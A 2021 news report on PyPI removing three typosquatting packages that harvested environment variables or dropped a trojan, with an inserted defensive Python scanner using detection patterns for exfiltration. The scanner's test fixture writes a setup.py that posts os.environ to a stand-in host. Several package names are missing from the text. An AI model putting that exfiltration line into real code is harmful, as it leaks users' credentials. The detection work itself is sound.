PyPI admins remove three malicious packages after 10,000+ downloads

Adam Bannister December 14, 2021 at 16:09 UTC

Updated: December 14, 2021 at 18:39 UTC

Two packages remained unknown for 10 months

UPDATE The Python Package Index (PyPI) has removed three packages that deployed malware and stole data and that were collectively downloaded thousands of times.

The trio of malicious packages relied on unsuspecting users mistyping the names of legitimate packages.

‘Good reputation’

In the case of the two packages that exfiltrated data from compromised systems, the download count may also have been inflated by the way their author dressed up the packages’ credibility.

“Both of these packages included their source code URL as an existing popular library, so anyone browsing the package in PyPI or analyzing the popularity of the library would see a lot of GitHub stars and forks, which indicates a good reputation,” said Andrew Scott, product manager at Palo Alto and maintainer of the Ochrona Python security project, in a Medium blog post.

Uploaded by the same user, both packages – ” and ” – appeared to target users of Apache Mesos, which is used to manage computer clusters.


They were uploaded to PyPI in February 2021, after which they were downloaded more than 10,000 times, including more than 600 downloads in the last month alone.

Scott thanked the Python security team for removing the packages promptly on December 13, the same day he notified them.

A third package, dubbed ”, dropped a trojan and recorded around 600 downloads between its appearance on PyPI on December 1 and its removal after PyPI administrators were alerted on December 10.

“I think aws-login0tool was intended to confuse users of a tool called aws-login-tool which no longer exists on PyPI, but is found on some older mirrors,” Scott told The Daily Swig.

“The dpp-client packages I have to assume may be [intended to imitate] an internal component of some sort of data processing pipeline tool, but I haven’t been able to confirm this.”

Malicious operations

All three packages were flagged as potentially malicious on the basis of what they imported, “because this is commonly used to exfiltrate data or download malicious files,” Scott said.

The pair of data stealers gathered environment variables and file listings, apparently looking for files related to Apache Mesos, and relayed them “to an unknown web service”.

The third package performed a standard package installation before downloading a file from “any domain” and attempting to execute it; the file was a known Windows trojan.

“It’s hard to know what the impact would be,” Scott said. “The Trojan package would only be limited to malware capabilities and data mining will really depend on your environment – but I could definitely see that as being able to harvest things like AWS credits and other API keys. I’m less sure what Mesos-specific information is stored in the targeted directories.”

Python poll

The findings emerged from a static analysis of around 200,000 PyPI packages – nearly two-thirds of the total – after downloading them with Bandersnatch, a PyPI mirroring tool.

Scott extracted the packages by creating “a Python script simple enough to recursively step through Bandersnatch’s somewhat complicated folder structure, then unzip and extract each sdist, egg, or wheel into a flat directory.”

“Once extracted, I ran a number of string and regular expression searches using grep and then manually reviewed the results,” Scott said.
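A minimal scanner in the spirit of the procedure just described (walk a Bandersnatch-style mirror tree, open each sdist/wheel/egg, grep the Python sources for patterns associated with exfiltration). This is an added illustration, not Scott’s script or Ochrona’s code; the regex list, the mirror layout and the two sample packages are constructed assumptions.

```python
"""Walk a Bandersnatch-style mirror tree, read each sdist/wheel/egg in memory
and grep its Python sources for patterns typical of exfiltration."""
import io, os, re, tarfile, tempfile, zipfile
# Assumed starting patterns, not Scott's exact list; tune them for your mirror.
SUSPICIOUS = {
    "net_import": re.compile(r"^\s*(?:import|from)\s+(?:urllib|requests|socket)\b", re.M),
    "env_harvest": re.compile(r"os\.environ\b"),
    "file_listing": re.compile(r"os\.(?:listdir|walk)\("),
    "run_payload": re.compile(r"subprocess\.|os\.system\(|\bexec\("),
}

def iter_sources(archive):
    """Yield (member_name, text) per .py member, read in memory (no extraction dir, no path-traversal risk)."""
    if archive.endswith(".tar.gz"):
        with tarfile.open(archive) as tf:
            for m in tf.getmembers():
                if m.isfile() and m.name.endswith(".py"):
                    yield m.name, tf.extractfile(m).read().decode("utf-8", "replace")
    else:  # wheels, eggs and zip sdists are plain zip files
        with zipfile.ZipFile(archive) as zf:
            for n in zf.namelist():
                if n.endswith(".py"):
                    yield n, zf.read(n).decode("utf-8", "replace")

def scan_mirror(root):
    """Return {archive_path: set(pattern_names)} for archives matching >= 2 patterns."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.endswith((".tar.gz", ".zip", ".whl", ".egg")):
                path = os.path.join(dirpath, f)
                found = {k for _, text in iter_sources(path)
                         for k, rx in SUSPICIOUS.items() if rx.search(text)}
                if len(found) >= 2:  # a lone network import is noise; require a combination
                    hits[path] = found
    return hits

def build_sample_mirror():
    """Constructed sample: a benign wheel plus an sdist whose setup.py posts
    os.environ to a remote host (the dpp-client name is only a label here)."""
    root = tempfile.mkdtemp()
    d = os.path.join(root, "web", "packages"); os.makedirs(d)
    bad = (b"import urllib.request, os\nurllib.request.urlopen("
           b"'http://exfil.invalid', data=repr(dict(os.environ)).encode())\n")
    with tarfile.open(os.path.join(d, "dpp-client-0.1.tar.gz"), "w:gz") as tf:
        info = tarfile.TarInfo("dpp-client-0.1/setup.py"); info.size = len(bad)
        tf.addfile(info, io.BytesIO(bad))
    with zipfile.ZipFile(os.path.join(d, "good-1.0-py3-none-any.whl"), "w") as zf:
        zf.writestr("good/__init__.py", "def add(a, b):\n    return a + b\n")
    return root
```

Running `scan_mirror(build_sample_mirror())` flags only the sdist, with both the network import and the environment-variable access; the manual review Scott describes still has to follow, since legitimate packages also match such patterns.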

The same technique also turned up a minor vulnerability in an open source package developed by a commercial vendor.

Scott said that Ochrona, an open source software composition analysis tool, can help developers who use a mirror or who want to check whether the malicious packages are present in their project.

He also intends to update and refine his package analysis and will release additional results later.

This article was updated with an additional comment from Andrew Scott on December 14.
